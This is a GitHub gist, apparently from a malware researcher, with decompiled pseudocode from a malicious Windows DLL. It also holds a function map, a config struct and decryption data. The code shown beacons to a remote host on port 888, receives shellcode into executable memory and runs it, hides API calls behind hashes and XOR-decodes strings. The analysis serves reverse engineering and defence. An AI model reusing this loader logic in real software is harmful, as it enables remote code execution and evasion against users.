-
-
Save hasherezade/ce4a622b52012f766c30f4779cce1bd9 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
__int64 __fastcall beacon_to_receive_shellcode(__int64 socket1) | |
{ | |
__int64 (__fastcall *lstrlenA)(char *); // rax | |
__int64 len1; // rax | |
__int64 _len1; // rdi | |
unsigned int (__fastcall *send)(__int64, char *, __int64, _QWORD, __int64, __int64); // rax | |
void (__fastcall *closesocket)(__int64); // rax | |
_BYTE *shellc_buf; // rax | |
_BYTE *_shellc_buf; // rdx | |
__int64 next_chunk; // rcx | |
__int64 (__fastcall *recv)(__int64, char *, __int64, _QWORD); // rax | |
__int64 size_received; // rax | |
int index; // ebx | |
__int64 (__fastcall *VirtualAlloc)(_QWORD, __int64, __int64, __int64); // rax | |
__int64 v14; // [rsp+20h] [rbp-228h] BYREF | |
__int64 v15; // [rsp+28h] [rbp-220h] BYREF | |
char received_buf[512]; // [rsp+30h] [rbp-218h] BYREF | |
LOBYTE(v14) = 0; | |
HIDWORD(v14) = 35; | |
lstrlenA = (__int64 (__fastcall *)(char *))load_func_by_hash(0i64, 1u, 0x2D40B8E6u); | |
len1 = lstrlenA((char *)&v14 + 4); | |
LOBYTE(v15) = 0; | |
_len1 = len1; | |
HIDWORD(v15) = 35; | |
send = (unsigned int (__fastcall *)(__int64, char *, __int64, _QWORD, __int64, __int64))load_func_by_hash( | |
0i64, | |
4u, | |
0xE797764u); | |
if ( send(socket1, (char *)&v15 + 4, _len1, 0i64, v14, v15) == -1 ) | |
{ | |
closesocket = (void (__fastcall *)(__int64))load_func_by_hash(0i64, 4u, 0x939D7D9C); | |
closesocket(socket1); | |
shellc_buf = (_BYTE *)load_func_by_hash(0i64, 4u, 0x8FB8B5BD);// WSACleanup | |
} | |
else | |
{ | |
recv = (__int64 (__fastcall *)(__int64, char *, __int64, _QWORD))load_func_by_hash(0i64, 4u, 0xE5971F6u); | |
size_received = recv(socket1, received_buf, 512i64, 0i64); | |
index = size_received; | |
if ( (int)size_received <= 0 ) | |
return size_received; | |
VirtualAlloc = (__int64 (__fastcall *)(_QWORD, __int64, __int64, __int64))load_func_by_hash(0i64, 1u, 0x697A6AFEu); | |
shellc_buf = (_BYTE *)VirtualAlloc(0i64, 512i64, 0x3000i64, 64i64); | |
if ( shellc_buf ) | |
{ | |
_shellc_buf = shellc_buf; | |
do | |
{ | |
next_chunk = (unsigned __int8)_shellc_buf[received_buf - shellc_buf]; | |
*_shellc_buf++ = next_chunk; | |
--index; | |
} | |
while ( index ); | |
} | |
} | |
return ((__int64 (__fastcall *)(__int64, _BYTE *))shellc_buf)(); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
char __fastcall communicate_over_socket(my_struct *struct1) | |
{ | |
__int64 (__fastcall *socket)(__int64, __int64, __int64); // rax | |
SOCKET socket1; // rsi | |
char result; // al | |
unsigned __int64 v5; // rdi | |
unsigned __int64 i; // rcx | |
__int64 (__fastcall *gethostbyname)(char *); // rax | |
hostent *host_val; // rax | |
void (__fastcall *closesocket)(SOCKET); // rax | |
__int64 (__fastcall *htons)(__int64); // rax | |
unsigned int (__fastcall *connect)(SOCKET, sockaddr_in *, __int64); // rax | |
__int64 (__fastcall *lstrlenA)(char *); // rax | |
__int64 v13; // rax | |
__int64 v14; // rbx | |
unsigned int (__fastcall *send)(SOCKET, char *, __int64, _QWORD, _QWORD, __int64); // rax | |
BYTE *curr_indx; // rbx | |
int v17; // eax | |
BYTE *buf_rec; // rcx | |
BYTE buf_bound; // dl | |
BYTE *v20; // rcx | |
unsigned __int8 v21; // dl | |
signed __int64 v22; // r8 | |
__int64 v23; // rdx | |
BYTE v24; // cl | |
char v25[8]; // [rsp+20h] [rbp-69h] BYREF | |
__int64 v26; // [rsp+28h] [rbp-61h] BYREF | |
char v27; // [rsp+30h] [rbp-59h] | |
int extension; // [rsp+34h] [rbp-55h] BYREF | |
char v29; // [rsp+38h] [rbp-51h] | |
char v30[8]; // [rsp+3Ch] [rbp-4Dh] BYREF | |
int formatstr_s_s[3]; // [rsp+44h] [rbp-45h] BYREF | |
char v32; // [rsp+50h] [rbp-39h] | |
int v33[5]; // [rsp+54h] [rbp-35h] BYREF | |
sockaddr_in sock_addr1; // [rsp+68h] [rbp-21h] BYREF | |
char full_host[64]; // [rsp+80h] [rbp-9h] BYREF | |
socket = (__int64 (__fastcall *)(__int64, __int64, __int64))load_func_by_hash(0i64, 4u, 0xFC7AF16A); | |
socket1 = socket(2i64, 1i64, 6i64); | |
if ( socket1 == -1i64 ) | |
return 0; | |
sock_addr1.sin_family = 2; | |
v30[4] = 0; | |
formatstr_s_s[0] = 0x38B2F282; | |
formatstr_s_s[1] = 0x1D9C81D4; | |
v5 = 0i64; | |
for ( i = 0i64; i < 2; ++i ) | |
formatstr_s_s[i] ^= 0x1D9C81A7u; // "%s.%s" | |
to_wvsprintfA(full_host, formatstr_s_s, struct1->formatStr, struct1->hostAddr); | |
gethostbyname = (__int64 (__fastcall *)(char *))load_func_by_hash(0i64, 4u, 0xF44318C6); | |
host_val = (hostent *)gethostbyname(full_host); | |
if ( !host_val ) | |
goto LABEL_6; | |
memmove(&sock_addr1.sin_addr, *(const void **)host_val->h_addr_list, host_val->h_length); | |
htons = (__int64 (__fastcall *)(__int64))load_func_by_hash(0i64, 4u, 0x8E9BF775); | |
sock_addr1.sin_port = htons(888i64); // port = 888 | |
connect = (unsigned int (__fastcall *)(SOCKET, sockaddr_in *, __int64))load_func_by_hash(0i64, 4u, 0xEDD8FE8A); | |
if ( connect(socket1, &sock_addr1, 16i64) == -1 ) | |
goto LABEL_6; | |
v25[0] = 0; | |
*(_DWORD *)&v25['\x04'] = '@'; | |
lstrlenA = (__int64 (__fastcall *)(char *))load_func_by_hash(0i64, 1u, 0x2D40B8E6u); | |
v13 = lstrlenA(&v25[4]); | |
LOBYTE(v26) = 0; | |
v14 = v13; | |
HIDWORD(v26) = '@'; | |
send = (unsigned int (__fastcall *)(SOCKET, char *, __int64, _QWORD, _QWORD, __int64))load_func_by_hash( | |
0i64, | |
4u, | |
0xE797764u); | |
if ( send(socket1, (char *)&v26 + 4, v14, 0i64, *(_QWORD *)v25, v26) == -1 ) | |
{ | |
LABEL_6: | |
closesocket = (void (__fastcall *)(SOCKET))load_func_by_hash(0i64, 4u, 0x939D7D9C); | |
closesocket(socket1); | |
} | |
else | |
{ | |
curr_indx = struct1->bufReceived; | |
v17 = to_recv(socket1, (__int64)struct1->bufReceived, 32u); | |
if ( v17 <= 0 ) | |
{ | |
if ( !v17 ) | |
{ | |
result = 1; | |
struct1->mySocket = socket1; | |
return result; | |
} | |
} | |
else | |
{ | |
v27 = 0; | |
strcpy((char *)&extension, "exe"); // "exe" | |
if ( struct1 != (my_struct *)-448i64 ) | |
{ | |
buf_rec = struct1->bufReceived; | |
while ( 1 ) | |
{ | |
buf_bound = buf_rec[(char *)&extension - (char *)curr_indx]; | |
if ( *buf_rec < buf_bound || *buf_rec > buf_bound ) | |
break; | |
if ( (unsigned __int64)(++buf_rec - curr_indx) >= 3 ) | |
{ | |
beacon_to_receive_shellcode(socket1); | |
return 0; | |
} | |
} | |
} | |
v29 = 0; | |
strcpy(v30, "run"); // "run" | |
if ( struct1 != (my_struct *)-448i64 ) | |
{ | |
v20 = struct1->bufReceived; | |
while ( 1 ) | |
{ | |
v21 = v20[v30 - (char *)curr_indx]; | |
if ( *v20 < v21 || *v20 > v21 ) | |
break; | |
if ( (unsigned __int64)(++v20 - curr_indx) >= 3 ) | |
{ | |
to_recv_0(socket1); | |
return 0; | |
} | |
} | |
} | |
v32 = 0; | |
v33[0] = 0x6E5AC0F; | |
v33[1] = 0x1AEBED0C; | |
v33[2] = 0x19EBA347; | |
v33[3] = 0x7484C069; | |
do | |
v33[v5++] ^= 0x7484C069u; // "flare.com" | |
while ( v5 < 4 ); | |
if ( struct1 != (my_struct *)-448i64 ) | |
{ | |
v22 = (char *)v33 - (char *)curr_indx; | |
v23 = -(__int64)curr_indx; | |
while ( 1 ) | |
{ | |
v24 = curr_indx[v22]; | |
if ( *curr_indx < v24 || *curr_indx > v24 ) | |
break; | |
++curr_indx; | |
if ( (unsigned __int64)&curr_indx[v23] >= 0xC ) | |
{ | |
result = 1; | |
struct1->mySocket = socket1; | |
return result; | |
} | |
} | |
} | |
} | |
} | |
return 0; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
__int64 __fastcall decode_and_set_keys(my_struct *struct_1) | |
{ | |
__int8 v2; // r8 | |
unsigned int index; // edx | |
__int8 v4; // r9 | |
__int8 v5; // r10 | |
__int8 v6; // r11 | |
__int8 v7; // di | |
__int8 v8; // si | |
__int8 v9; // r14 | |
__int8 v10; // r15 | |
__int8 v11; // r12 | |
__int8 v12; // r13 | |
__int64 (__fastcall *lstrlenA)(__m128i *); // rax | |
int reg_len; // eax | |
int v16; // [rsp+24h] [rbp-2Ch] BYREF | |
__m128i reg_key1; // [rsp+28h] [rbp-28h] BYREF | |
__m128i reg_key0; // [rsp+38h] [rbp-18h] | |
reg_key0 = _mm_load_si128(&g_xorData1); | |
v2 = reg_key0.m128i_i8[6]; | |
index = 0; | |
v4 = reg_key0.m128i_i8[5]; | |
v5 = reg_key0.m128i_i8[4]; | |
v6 = reg_key0.m128i_i8[3]; | |
v7 = reg_key0.m128i_i8[2]; | |
v8 = reg_key0.m128i_i8[1]; | |
v9 = reg_key0.m128i_i8[0]; | |
reg_key1 = _mm_load_si128(&g_xorData2); | |
v10 = reg_key1.m128i_i8[15]; | |
v11 = reg_key1.m128i_i8[14]; | |
v12 = reg_key1.m128i_i8[13]; | |
do | |
{ | |
switch ( index ) | |
{ | |
case 0u: | |
reg_key1.m128i_i8[0] ^= struct_1->decryptedStr[20]; | |
break; | |
case 1u: | |
reg_key1.m128i_i8[1] ^= struct_1->decryptedStr[21]; | |
break; | |
case 2u: | |
reg_key1.m128i_i8[2] ^= struct_1->decryptedStr[14]; | |
break; | |
case 3u: | |
reg_key1.m128i_i8[3] ^= struct_1->decryptedStr[16]; | |
break; | |
case 4u: | |
reg_key1.m128i_i8[4] ^= struct_1->decryptedStr[15]; | |
break; | |
case 5u: | |
reg_key1.m128i_i8[5] ^= struct_1->decryptedStr[14]; | |
break; | |
case 6u: | |
reg_key1.m128i_i8[6] ^= struct_1->decryptedStr[13]; | |
break; | |
case 7u: | |
reg_key1.m128i_i8[7] ^= struct_1->decryptedStr[9]; | |
break; | |
case 8u: | |
reg_key1.m128i_i8[8] ^= struct_1->decryptedStr[8]; | |
break; | |
case 9u: | |
reg_key1.m128i_i8[9] ^= struct_1->decryptedStr[11]; | |
break; | |
case 0xAu: | |
reg_key1.m128i_i8[10] ^= struct_1->decryptedStr[12]; | |
break; | |
case 0xBu: | |
reg_key1.m128i_i8[11] ^= struct_1->decryptedStr[25]; | |
break; | |
case 0xCu: | |
reg_key1.m128i_i8[12] ^= struct_1->decryptedStr[23]; | |
break; | |
case 0xDu: | |
v12 ^= struct_1->decryptedStr[28]; | |
break; | |
case 0xEu: | |
v11 ^= struct_1->decryptedStr[27]; | |
break; | |
case 0xFu: | |
v10 ^= struct_1->decryptedStr[29]; | |
break; | |
case 0x10u: | |
v9 ^= struct_1->decryptedStr[10]; | |
break; | |
case 0x11u: | |
v8 ^= struct_1->decryptedStr[18]; | |
break; | |
case 0x12u: | |
v7 ^= struct_1->decryptedStr[24]; | |
break; | |
case 0x13u: | |
v6 ^= struct_1->decryptedStr[19]; | |
break; | |
case 0x14u: | |
v5 ^= struct_1->decryptedStr[22]; | |
break; | |
case 0x15u: | |
v4 ^= struct_1->decryptedStr[10]; | |
break; | |
case 0x16u: | |
v2 ^= '@'; | |
break; | |
default: | |
break; | |
} | |
++index; | |
} | |
while ( index < 32 ); | |
reg_key0.m128i_i8[6] = v2; | |
reg_key0.m128i_i8[5] = v4; | |
reg_key0.m128i_i8[4] = v5; | |
reg_key0.m128i_i8[3] = v6; | |
reg_key0.m128i_i8[2] = v7; | |
reg_key0.m128i_i8[1] = v8; | |
reg_key0.m128i_i8[0] = v9; | |
reg_key1.m128i_i8[15] = v10; | |
reg_key1.m128i_i8[14] = v11; | |
reg_key1.m128i_i8[13] = v12; | |
v16 = 48; | |
lstrlenA = (__int64 (__fastcall *)(__m128i *))load_func_by_hash(0i64, 1u, 0x2D40B8E6u); | |
reg_len = lstrlenA(®_key1); | |
set_registry_key(struct_1, (__int64)®_key1, reg_len + 1, (__int64)&v16); | |
return 0i64; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
l3rlcps_7r_vb33eehskc3 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1000;DllMain | |
1010;Start | |
1020;check_dll | |
1120;func_load_checks | |
1210;fetch_new_dll_names | |
12c0;load_func_by_hash | |
1370;to_load_func_by_hash | |
1380;initialize_dll_names | |
18e0;sub_1800018E0 | |
1990;_Start | |
1a40;to_png_and_socket | |
1e60;init_inactive_strings | |
1f80;to_communicate_over_socket | |
2070;communicate_over_socket | |
2410;beacon_to_receive_shellcode | |
2590;on_command_run | |
2730;decode_and_set_keys | |
2a20;set_registry_key | |
2ce0;to_recv | |
2d30;to_wvsprintfA | |
2d80;get_system_date_format | |
2e60;to_name_check | |
2f70;maybe_aes_stuff | |
33e0;__security_check_cookie | |
3404;dllmain_crt_dispatch | |
3454;dllmain_crt_process_attach | |
3580;dllmain_crt_process_detach | |
3604;dllmain_dispatch | |
36fc;dllmain_raw | |
3750;section:_[.text] | |
3790;__raise_securityfailure | |
37c4;__report_gsfailure | |
3898;__report_rangecheckfailure | |
38ac;__report_securityfailure | |
3948;capture_current_context | |
39b8;capture_previous_context | |
3a2c;__scrt_acquire_startup_lock | |
3a68;__scrt_dllmain_after_initialize_c | |
3a9c;__scrt_dllmain_before_initialize_c | |
3ab4;anti_vm | |
3adc;__scrt_dllmain_crt_thread_detach | |
3af4;__scrt_dllmain_exception_filter | |
3b58;__scrt_dllmain_uninitialize_c | |
3b88;__scrt_dllmain_uninitialize_critical | |
3b9c;__scrt_initialize_crt | |
3be8;__scrt_initialize_onexit_tables | |
3cb4;__scrt_is_nonwritable_in_current_image | |
3d50;__scrt_release_startup_lock | |
3d74;__scrt_uninitialize_crt | |
3da0;_onexit | |
3df0;atexit | |
3e08;__security_init_cookie | |
3eb4;_InitializeSListHead | |
3ec4;sub_180003EC4 | |
3ed0;sub_180003ED0 | |
3ed8;sub_180003ED8 | |
3ee0;__scrt_initialize_default_local_stdio_options | |
3efc;sub_180003EFC | |
3f04;sub_180003F04 | |
3f0c;__scrt_fastfail | |
4054;_RTC_Initialize_0 | |
40a0;_RTC_Initialize_0_0 | |
40ec;j__guard_check_icall_nop | |
40f4;__isa_available_init | |
42bc;__uncaught_exception | |
42d0;strrchr | |
4410;__C_specific_handler | |
460c;__vcrt_initialize | |
4640;Concurrency::details::ScheduleGroupSegmentBase::HasUnrealizedChores | |
4654;__vcrt_thread_detach | |
4668;__vcrt_uninitialize | |
4688;__vcrt_uninitialize_critical | |
4698;__std_type_info_destroy_list | |
46e0;memset | |
4890;_local_unwind | |
48c0;_NLG_Notify | |
48f0;__NLG_Return2 | |
48f4;_guard_check_icall_nop | |
48f8;__vcrt_freefls | |
4918;__vcrt_freeptd | |
4968;__vcrt_getptd_noexit | |
4a20;__vcrt_initialize_ptd | |
4a60;__vcrt_uninitialize_ptd | |
4a84;__vcrt_initialize_locks | |
4acc;__vcrt_uninitialize_locks | |
4b04;try_get_function | |
4ccc;__vcrt_FlsAlloc | |
4d20;__vcrt_FlsFree | |
4d74;__vcrt_FlsGetValue | |
4dc8;__vcrt_FlsSetValue | |
4e30;__vcrt_InitializeCriticalSectionEx | |
4ea8;__vcrt_initialize_winapi_thunks | |
4ef4;__vcrt_uninitialize_winapi_thunks | |
4f34;__vcrt_initialize_pure_virtual_call_handler | |
4f58;__crt_strtox::is_overflow_condition_ulong_ | |
4f84;unknown_libname_10 | |
4f98;__crt_strtox::parse_integer_ulong | |
52ac;_LocaleUpdate::_LocaleUpdate | |
533c;_wtol | |
5368;j__malloc_base | |
5370;strnlen | |
54cc;strncpy_s | |
55a0;_initterm | |
5618;_initterm_e | |
5664;_seh_filter_dll | |
5678;_seh_filter_exe | |
5808;dyntls_init_exception_filter | |
5814;common_exit | |
5980;exit_or_terminate_process | |
59cc;try_cor_exit_process | |
5a38;sub_180005A38 | |
5a40;_cexit | |
5a50;_exit | |
5a5c;sub_180005A5C | |
5a64;parse_command_line_char_ | |
5c20;__acrt_allocate_buffer_for_argv | |
5c84;_configure_narrow_argv | |
5dfc;common_initialize_environment_nolock_char_ | |
5e68;create_environment_char_ | |
5f64;unknown_libname_11 | |
5fa8;sub_180005FA8 | |
5fc4;sub_180005FC4 | |
5fe0;__dcrt_uninitialize_environments_nolock | |
6018;common_initialize_environment_nolock<char> | |
6020;__crt_seh_guarded_call_int_::operator | |
605c;__crt_seh_guarded_call<int>::operator | |
61fc;_lambda_4e60a939b0d047cfe11ddc22648dfba9_::operator | |
63d8;sub_1800063D8 | |
63e8;_execute_onexit_table | |
6424;_initialize_onexit_table | |
6464;_register_onexit_function | |
64ac;initialize_global_variables | |
64c0;initialize_c | |
64e4;__vcrt_uninitialize_critical_0 | |
64f4;initialize_pointers | |
6548;sub_180006548 | |
6550;uninitialize_allocated_memory | |
65e0;sub_1800065E0 | |
65e4;__acrt_initialize | |
65f8;Concurrency::details::ScheduleGroupSegmentBase::HasUnrealizedChores | |
660c;__vcrt_uninitialize_critical_1 | |
661c;__acrt_uninitialize | |
6630;__vcrt_uninitialize_critical_2 | |
6640;terminate | |
6668;_free_base | |
66a8;_malloc_base | |
6708;strcpy_s | |
6768;abort | |
67c0;_calloc_base | |
6838;__acrt_call_reportfault | |
6994;sub_180006994 | |
699c;_invalid_parameter | |
6a44;_invalid_parameter_noinfo | |
6a64;_invoke_watson | |
6aac;__acrt_errno_from_os_error | |
6af4;__acrt_errno_map_os_error | |
6b44;__doserrno | |
6b64;_errno | |
6b84;__pctype_func | |
6bb4;_isctype_l | |
6cc4;__crt_seh_guarded_call_void_::operator | |
6d24;__crt_seh_guarded_call<void>::operator | |
6d6c;__crt_seh_guarded_call<void>::operator | |
6dac;__crt_seh_guarded_call<void>::operator | |
6dec;construct_ptd_array | |
6ebc;Concurrency::details::SchedulerProxy::DeleteThis | |
6edc;destroy_ptd_array | |
6fd4;replace_current_thread_locale_nolock | |
703c;__acrt_freeptd | |
7080;__acrt_getptd | |
7114;__acrt_getptd_noexit | |
71b4;__acrt_initialize_ptd | |
71f0;__vcrt_uninitialize_ptd_0 | |
7214;__acrt_update_locale_info | |
7248;__acrt_update_locale_info_0 | |
727c;__acrt_set_locale_changed | |
7288;__acrt_uninitialize_locale | |
72d0;__vcrt_initialize_locks_0 | |
7318;sub_180007318 | |
7334;__vcrt_uninitialize_locks_0 | |
736c;sub_18000736C | |
7388;try_get_function | |
7528;__acrt_FlsAlloc | |
7580;__acrt_FlsFree | |
75d8;__vcrt_FlsFree_0 | |
7630;__acrt_FlsSetValue | |
7698;__acrt_InitializeCriticalSectionEx | |
7710;__acrt_LCMapStringEx | |
7800;__acrt_LocaleNameToLCID | |
7868;__acrt_initialize_winapi_thunks | |
78a0;__acrt_is_packaged_app | |
7928;__acrt_uninitialize_winapi_thunks | |
796c;unknown_libname_12 | |
7980;common_expand_argv_wildcards_char_ | |
7b8c;copy_and_add_argument_to_buffer_char_ | |
7c9c;expand_argument_wildcards_char_ | |
7e48;unknown_libname_13 | |
7f10;common_expand_argv_wildcards<char> | |
7f18;__crt_seh_guarded_call<void>::operator | |
7f50;_lambda_ad1ced32f4ac17aa236e5ef05d6b3b7c_::operator | |
8168;getSystemCP | |
81e8;setSBCS | |
8278;setSBUpLow | |
845c;setmbcp_internal | |
8614;__acrt_initialize_multibyte | |
863c;__acrt_update_thread_multibyte_data | |
86fc;_setmbcp_nolock | |
89a4;x_ismbbtype_l | |
8a1c;_ismbblead | |
8a30;__acrt_initialize_command_line | |
8a58;__dcrt_get_narrow_environment_from_os | |
8b5c;j__recalloc_base | |
8b64;_recalloc_base | |
8bfc;__acrt_initialize_heap | |
8c18;sub_180008C18 | |
8c24;initialize_inherited_file_handles_nolock | |
8d10;initialize_stdio_handles_nolock | |
8e0c;__acrt_initialize_lowio | |
8e48;__acrt_uninitialize_lowio | |
8e88;__acrt_execute_initializers | |
8f1c;__acrt_execute_uninitializers | |
8f6c;sub_180008F6C | |
8f74;_callnewh | |
8fb4;_query_new_handler | |
8fe8;__crt_seh_guarded_call_void | |
9030;__acrt_get_sigabrt_handler | |
9060;_initp_misc_winsig | |
9080;raise | |
931c;__acrt_has_user_matherr | |
933c;sub_18000933C | |
9344;__acrt_invoke_user_matherr | |
938c;sub_18000938C | |
9394;_mbtowc_l | |
94dc;mbtowc | |
94e4;_fileno | |
950c;__acrt_initialize_stdio | |
962c;__acrt_uninitialize_stdio | |
9688;sub_180009688 | |
9694;sub_180009694 | |
96a0;_isleadbyte_l | |
96e0;__acrt_GetStringTypeA | |
9894;__acrt_add_locale_ref | |
9920;__acrt_free_locale | |
9ac0;__acrt_locale_free_lc_time_if_unreferenced | |
9af8;__acrt_locale_release_lc_time_reference | |
9b20;__acrt_release_locale_ref | |
9bc8;__acrt_update_thread_locale_data | |
9c38;_updatetlocinfoEx_nolock | |
9ca0;__free_lconv_mon | |
9dac;__free_lconv_num | |
9e18;free_crt_array_internal | |
9e70;__acrt_locale_free_time | |
9f78;GetTableIndexFromLocaleName | |
a040;__crtDownlevelLocaleNameToLCID | |
a080;shortsort | |
a150;qsort | |
a484;unknown_libname_14 | |
a524;_mbsdec | |
a52c;_mbsdec_l | |
a5c4;initialize_multibyte | |
a5dc;__acrt_LCMapStringA_stat | |
a938;__acrt_LCMapStringA | |
a9d0;_msize | |
aa0c;_realloc_base | |
aa90;__acrt_lowio_create_handle_array | |
ab28;__acrt_lowio_destroy_handle_array | |
ab78;__acrt_lowio_ensure_fh_exists | |
ac30;__acrt_lowio_unlock_fh_0 | |
ac54;__acrt_lowio_unlock_fh_0_0 | |
ac78;_free_osfhnd | |
ad34;_get_osfhandle | |
adac;_isatty | |
ae0c;__acrt_stdio_flush_nolock | |
ae84;_fflush_nolock | |
aed0;_flushall | |
aedc;common_flush_all | |
afc0;_fcloseall | |
b074;__acrt_stdio_free_buffer_nolock | |
b0b4;__strncnt | |
b0cc;sub_18000B0CC | |
b0d4;__crt_seh_guarded_call<int>::operator | |
b160;_commit | |
b1f4;write_double_translated_ansi_nolock | |
b3fc;write_text_ansi_nolock | |
b504;write_text_utf16le_nolock | |
b620;write_text_utf8_nolock | |
b794;_write | |
b880;_write_nolock | |
bb70;log10 | |
c11c;common_lseek_nolock___int64_ | |
c1b8;common_lseek_nolock<__int64> | |
c1c0;_fclose_nolock | |
c244;ftell | |
c2b0;_putwch_nolock | |
c30c;_call_matherr | |
c374;_exception_enabled | |
c430;_handle_error | |
c560;__acrt_initialize_fma3 | |
c5d0;_log10_special | |
c5f0;_log_special_common | |
c688;__crt_seh_guarded_call<int>::operator | |
c6fc;_close | |
c7a0;_close_nolock | |
c85c;__acrt_stdio_free_stream | |
c8a0;__dcrt_lowio_initialize_console_output | |
c8dc;__dcrt_terminate_console_output | |
c910;_get_fpsr | |
c920;_set_fpsr | |
c92a;_fclrf | |
c95c;_return | |
c960;_raise_exc | |
c988;_raise_exc_ex | |
cc90;_set_errno_from_matherr | |
ccc0;_clrfp | |
cce0;_ctrlfp | |
cd5c;_set_statfp | |
cd7c;_statfp | |
cd8e;IsProcessorFeaturePresent | |
cd94;RtlUnwindEx | |
cda0;_FindPESection | |
cdf0;_IsNonwritableInCurrentImage | |
ce40;_ValidateImageBase | |
ce70;__GSHandlerCheck | |
ce90;__GSHandlerCheckCommon | |
cf00;_alloca_probe | |
cf70;memmove | |
d3c0;memcmp | |
d4a0;_guard_dispatch_icall_nop |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
structure: | |
struct _my_struct | |
{ | |
char currentDateStr[12]; | |
BYTE someData[11]; | |
QWORD resourceBin; | |
DWORD resourceSize; | |
DWORD roundId; | |
char processName[261]; | |
char formatStr[34]; | |
BOOL isWow64; | |
DWORD connAttempts; | |
DWORD unknown0; | |
QWORD padding1[4]; | |
DWORD wow64Flag; | |
char *hostAddr; | |
DWORD timeout; | |
DWORD unk; | |
SOCKET mySocket; | |
BYTE decryptedStr[32]; | |
BYTE bufReceived[32]; | |
}; | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
C3 C1 A8 06 C2 96 33 00 00 00 00 00 00 00 00 00 8A 1D 89 15 14 9F C1 1D 99 7E 8A 1B 00 00 00 00 | |
E2 A4 B7 A7 D7 AC 87 8D 9B 9C 85 0D D8 8E E5 FA |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment